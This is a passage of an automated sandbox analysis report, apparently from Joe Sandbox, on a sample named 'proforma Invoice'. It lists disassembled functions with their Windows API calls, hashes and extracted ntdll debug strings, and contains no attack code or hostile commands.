                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 976261c2090beaf7761a7e578b6574be5373c1aea863a2aff8f02f2be9c57ce1
                                                                          • Instruction ID: 5deae782a6f90318f90cdaf530a4784fcf3403325b7a1d1ba995d9823e504f66
                                                                          • Opcode Fuzzy Hash: 976261c2090beaf7761a7e578b6574be5373c1aea863a2aff8f02f2be9c57ce1
                                                                          • Instruction Fuzzy Hash: 40E06D716003047BD610EE99EC41FAB77ADEFC8714F004019F918A7241C671B9108BB8
                                                                          Function 0042C983 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 237 42c983-42c9c7 call 404a93 call 42d8b3 RtlAllocateHeap
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00424A7F,?,?,00424A7F,00000000,?,?,00424A7F,?,00000104), ref: 0042C9C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ae3a77b44a70c96677e662bd54acaead76c1205bde67aa46dfc959a20e6bb57e
                                                                          • Instruction ID: 9d6c3d2b06f1d0e43ad6ec7aa0dddcfad8651c14c3ccdf4e36b6d1596e56025d
                                                                          • Opcode Fuzzy Hash: ae3a77b44a70c96677e662bd54acaead76c1205bde67aa46dfc959a20e6bb57e
                                                                          • Instruction Fuzzy Hash: BAE06DB16003047BD614EE99EC41F9B77ACEFC9710F00401AF918A7241D670BE108BB8
                                                                          Function 0042CA23 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 252 42ca23-42ca5c call 404a93 call 42d8b3 ExitProcess
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,3AC1D885,?,?,3AC1D885), ref: 0042CA57
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: 70e1010529ec0fb5d52cddbeb0b181d07d26c66f585e4acd9267fd2fb8c23613
                                                                          • Instruction ID: 7135c82dfa76e2c124559f17e6f5fc415edf9d4f41954f1f8579cc00978a4f8c
                                                                          • Opcode Fuzzy Hash: 70e1010529ec0fb5d52cddbeb0b181d07d26c66f585e4acd9267fd2fb8c23613
                                                                          • Instruction Fuzzy Hash: 4FE046766402147BD620FA9ADC02F9BB76CDFC5724F10452AFA18A7285C671BA108BF4
                                                                          Function 011A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 257 11a2c0a-11a2c0f 258 11a2c1f-11a2c26 LdrInitializeThunk 257->258 259 11a2c11-11a2c18 257->259
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 69dd8f69e34a03683319c9da1764143e972d9dfc7e0b8f01cf76706b49f521dc
                                                                          • Instruction ID: 20230cc1418208a8d4fa21f1757f933c1109adc8ff414ac5d610ff303c7928f7
                                                                          • Opcode Fuzzy Hash: 69dd8f69e34a03683319c9da1764143e972d9dfc7e0b8f01cf76706b49f521dc
                                                                          • Instruction Fuzzy Hash: CCB09B719015C5C5DA15E7744B087177D0477D0701F65C061D2031641F4738C1D1E675

                                                                          Non-executed Functions

                                                                          Function 01218D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • a NULL pointer, xrefs: 01218F90
                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01218E3F
                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01218DD3
                                                                          • The instruction at %p tried to %s , xrefs: 01218F66
                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01218F26
                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01218FEF
                                                                          • The resource is owned exclusively by thread %p, xrefs: 01218E24
                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01218DC4
                                                                          • This failed because of error %Ix., xrefs: 01218EF6
                                                                          • *** then kb to get the faulting stack, xrefs: 01218FCC
                                                                          • write to, xrefs: 01218F56
                                                                          • read from, xrefs: 01218F5D, 01218F62
                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01218D8C
                                                                          • *** Inpage error in %ws:%s, xrefs: 01218EC8
                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01218F3F
                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01218F2D
                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01218E86
                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01218E4B
                                                                          • The critical section is owned by thread %p., xrefs: 01218E69
                                                                          • Go determine why that thread has not released the critical section., xrefs: 01218E75
                                                                          • *** enter .cxr %p for the context, xrefs: 01218FBD
                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01218DB5
                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01218F34
                                                                          • *** enter .exr %p for the exception record, xrefs: 01218FA1
                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01218E02
                                                                          • The instruction at %p referenced memory at %p., xrefs: 01218EE2
                                                                          • an invalid address, %p, xrefs: 01218F7F
                                                                          • <unknown>, xrefs: 01218D2E, 01218D81, 01218E00, 01218E49, 01218EC7, 01218F3E
                                                                          • The resource is owned shared by %d threads, xrefs: 01218E2E
                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01218DA3
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                          • API String ID: 0-108210295
                                                                          • Opcode ID: a936b67a4501ec3ebb85bab6dc0162e1c03cf3e11963bbe599248c7ef4ef599d
                                                                          • Instruction ID: fbe64df55c95ee8ff831f5c63a3b7f6c12ef44ce057a9dbad0ea6a8ae15f01e6
                                                                          • Opcode Fuzzy Hash: a936b67a4501ec3ebb85bab6dc0162e1c03cf3e11963bbe599248c7ef4ef599d
                                                                          • Instruction Fuzzy Hash: 54814C35A20202FFDB1ADB59CC8AE6B3FB5EFA6B94F050048FA146F115E371C412C662
                                                                          Function 011E2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2160512332
                                                                          • Opcode ID: 1a345cd226be01bb9b1f6de532cb3a585fd409f2268aab6022729038fcedd9f6
                                                                          • Instruction ID: b56bbad2b7f40c6ded18fac5adbe8d4dcc5a00c9b293bb57b078679649dfb205
                                                                          • Opcode Fuzzy Hash: 1a345cd226be01bb9b1f6de532cb3a585fd409f2268aab6022729038fcedd9f6
                                                                          • Instruction Fuzzy Hash: 2392B071604B42AFE729CF68C898F6BBBE8BB84754F04491DFA94D7250D770E844CB92
                                                                          Function 01198620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011D54CE
                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011D54E2
                                                                          • Critical section address., xrefs: 011D5502
                                                                          • Critical section debug info address, xrefs: 011D541F, 011D552E
                                                                          • Critical section address, xrefs: 011D5425, 011D54BC, 011D5534
                                                                          • double initialized or corrupted critical section, xrefs: 011D5508
                                                                          • Thread identifier, xrefs: 011D553A
                                                                          • corrupted critical section, xrefs: 011D54C2
                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011D540A, 011D5496, 011D5519
                                                                          • Invalid debug info address of this critical section, xrefs: 011D54B6
                                                                          • Address of the debug info found in the active list., xrefs: 011D54AE, 011D54FA
                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 011D5543
                                                                          • undeleted critical section in freed memory, xrefs: 011D542B
                                                                          • 8, xrefs: 011D52E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                          • API String ID: 0-2368682639
                                                                          • Opcode ID: f61ac85f10558373b3c9fcbc9e24aecce69f6ad8d9e45508c8432bfb4c425f1e
                                                                          • Instruction ID: d7ddaec29d71216543d8d18eeda15d28a877931f47f6584b2adbe0dd1596f49e
                                                                          • Opcode Fuzzy Hash: f61ac85f10558373b3c9fcbc9e24aecce69f6ad8d9e45508c8432bfb4c425f1e
                                                                          • Instruction Fuzzy Hash: 0F81ABB1A40349EFDB68CF99C844BAEBBB6FB08B14F144119F915BB240D375A941CBA0
                                                                          Function 011929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011D2498
                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011D24C0
                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011D2624
                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011D2602
                                                                          • @, xrefs: 011D259B
                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011D2409
                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011D2412
                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011D22E4
                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 011D261F
                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011D25EB
                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011D2506
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                          • API String ID: 0-4009184096
                                                                          • Opcode ID: c3573f1ffcaaf1dc1554beb2ddd4b99bf8871b4849a280de53d515f6fbe97e9a
                                                                          • Instruction ID: bae7f1a0ab5ec8bfcce25e13b042f08a3a61d8f5c900f95ef354cdf569fa956b
                                                                          • Opcode Fuzzy Hash: c3573f1ffcaaf1dc1554beb2ddd4b99bf8871b4849a280de53d515f6fbe97e9a
                                                                          • Instruction Fuzzy Hash: 530280B1D00229ABDF39DB54CC80BDAB7B8AF54704F4141DAEA19A7241DB709F84CF59
                                                                          Function 01208B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                          • API String ID: 0-2515994595
                                                                          • Opcode ID: 0bddd6e601e0e2a35f74296e56127852eced32ec648d356c4147edde417a3f24
                                                                          • Instruction ID: 8ddae504c066759d4c122ae19f54548c2be513ef02cec86ce50d71cfce1c3235
                                                                          • Opcode Fuzzy Hash: 0bddd6e601e0e2a35f74296e56127852eced32ec648d356c4147edde417a3f24
                                                                          • Instruction Fuzzy Hash: C451C3B19243069BD72ACF188944BABBBE8AFD8354F144B1DEA55831C6E770D604C792
                                                                          Function 0117AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-3197712848
                                                                          • Opcode ID: 78b318409957c60ac5c2a5930f85b6a1ae62ee66ffbaf943f1a073dfd7bb23c4
                                                                          • Instruction ID: a83bed75cbea49475e2ecad2205f25439a9b6b403436b882c513adefee1ee404
                                                                          • Opcode Fuzzy Hash: 78b318409957c60ac5c2a5930f85b6a1ae62ee66ffbaf943f1a073dfd7bb23c4
                                                                          • Instruction Fuzzy Hash: EA12BD716083528BD32DDB28D884BAEB7F5BF94B18F09091DE9858B391E734D944CB93
                                                                          Function 01210274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 0-1700792311
                                                                          • Opcode ID: 4b488f49dd38cfae3414a982997dd141977cf0e60d698d983bbacd536d3afbd6
                                                                          • Instruction ID: d8bc68b9cb8282c1d3b67ede8a499711d1b89482b2a32bf11253a70fa68b72e9
                                                                          • Opcode Fuzzy Hash: 4b488f49dd38cfae3414a982997dd141977cf0e60d698d983bbacd536d3afbd6
                                                                          • Instruction Fuzzy Hash: 7ED11331520286DFDB2ADF68D441AAEFBF2FF66704F088009F5559B256D7349981CB18
                                                                          Function 011E89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011E8A3D
                                                                          • AVRF: -*- final list of providers -*- , xrefs: 011E8B8F
                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011E8A67
                                                                          • VerifierFlags, xrefs: 011E8C50
                                                                          • VerifierDebug, xrefs: 011E8CA5
                                                                          • VerifierDlls, xrefs: 011E8CBD
                                                                          • HandleTraces, xrefs: 011E8C8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                          • API String ID: 0-3223716464
                                                                          • Opcode ID: 12acec5783123722fd2931aa0fa97a58924caac4cdba57d831719ba4abc30540
                                                                          • Instruction ID: 4f7ce4bd24ad39437b567fdcc2af6a6523a199f405ae6c371acb8e0d9abacb25
                                                                          • Opcode Fuzzy Hash: 12acec5783123722fd2931aa0fa97a58924caac4cdba57d831719ba4abc30540
                                                                          • Instruction Fuzzy Hash: 7F914772641B12EFDB2DDFA8D8C8B5A77E4AB94B58F050418FA41AB240C730EC01CB92
                                                                          Function 011E4DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpProtectedCopyMemory, xrefs: 011E4DF4
                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 011E4DF5
                                                                          • LdrpGenericExceptionFilter, xrefs: 011E4DFC
                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 011E4E38
                                                                          • ***Exception thrown within loader***, xrefs: 011E4E27
                                                                          • Execute '.cxr %p' to dump context, xrefs: 011E4EB1
                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 011E4E06
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-2973941816
                                                                          • Opcode ID: 8e146b6068a3c20103579b85120579cbdb6745bbf4a711f24d9a3310fa668d6d
                                                                          • Instruction ID: 44fcabe6f0bc47be1d13b9fca3b0a1f6a32125b797798d069da5915952f0a127
                                                                          • Opcode Fuzzy Hash: 8e146b6068a3c20103579b85120579cbdb6745bbf4a711f24d9a3310fa668d6d
                                                                          • Instruction Fuzzy Hash: 99216B721885227BE32C9AEC8C4DE267BD8FB85E64F240104F121EAD40C764D900C266
                                                                          Function 0116EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                          • API String ID: 0-1109411897
                                                                          • Opcode ID: 5d75fd1fff3ba4d6c8b5674c5c151a86137ba01e582c96e50a34b65cc5252d35
                                                                          • Instruction ID: 4ff2cb030935d568ce431f9d8dd1128891d3bd5a06bfeff92711e433effe6810
                                                                          • Opcode Fuzzy Hash: 5d75fd1fff3ba4d6c8b5674c5c151a86137ba01e582c96e50a34b65cc5252d35
                                                                          • Instruction Fuzzy Hash: ECA26974A0962ACFDB68CF18CCA87ADBBB5AF55704F1442E9D90DA7250DB319E81CF00
                                                                          Function 011963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-792281065
                                                                          • Opcode ID: ffe2720239a133fc5447b9663c11c9bd862cc00b77ab20dba7d13002cbbd1f1a
                                                                          • Instruction ID: eab030f03898330e3d62bbd2f1c6619c48b459390415a69a82fb061f1113791d
                                                                          • Opcode Fuzzy Hash: ffe2720239a133fc5447b9663c11c9bd862cc00b77ab20dba7d13002cbbd1f1a
                                                                          • Instruction Fuzzy Hash: FD915B31B017159BEF3DDF68F888BAE7BA1BF51B68F040128E5106BA81D7749841C7A1
                                                                          Function 0115645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitShimEngine, xrefs: 011B99F4, 011B9A07, 011B9A30
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 011B9A2A
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 011B9A01
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011B9A11, 011B9A3A
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011B99ED
                                                                          • apphelp.dll, xrefs: 01156496
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-204845295
                                                                          • Opcode ID: 1e4eaf5b882ffce126e225692e26950a4c251ffbe7cb66dffa145603ff0dfc14
                                                                          • Instruction ID: 660da67e8d6eee4cd9543a792b11cfa6f7372c26e94c563f64d2ab4d83c5f821
                                                                          • Opcode Fuzzy Hash: 1e4eaf5b882ffce126e225692e26950a4c251ffbe7cb66dffa145603ff0dfc14
                                                                          • Instruction Fuzzy Hash: 2751D071258308DFE72CDB24D885BAB7BE8AB84688F40091DFA959B250D730E945CB92
                                                                          Function 01192674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011D219F
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011D21BF
                                                                          • SXS: %s() passed the empty activation context, xrefs: 011D2165
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011D2178
                                                                          • RtlGetAssemblyStorageRoot, xrefs: 011D2160, 011D219A, 011D21BA
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011D2180
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                          • API String ID: 0-861424205
                                                                          • Opcode ID: 1cc1c98de2ddddc22a70ea4308c393af47fa5ffe2e02b679b3000e6cbc6bab7c
                                                                          • Instruction ID: 2f8a5b015784879c08b22970554c73737069f829555b6cb98f52c435fca2e933
                                                                          • Opcode Fuzzy Hash: 1cc1c98de2ddddc22a70ea4308c393af47fa5ffe2e02b679b3000e6cbc6bab7c
                                                                          • Instruction Fuzzy Hash: 4B31E536B4021677FB2D8AAA8C45F5E7A68DBA5E90F094059FA24BB240D3709A01C6A1
                                                                          Function 0119C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitializeProcess, xrefs: 0119C6C4
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0119C6C3
                                                                          • Loading import redirection DLL: '%wZ', xrefs: 011D8170
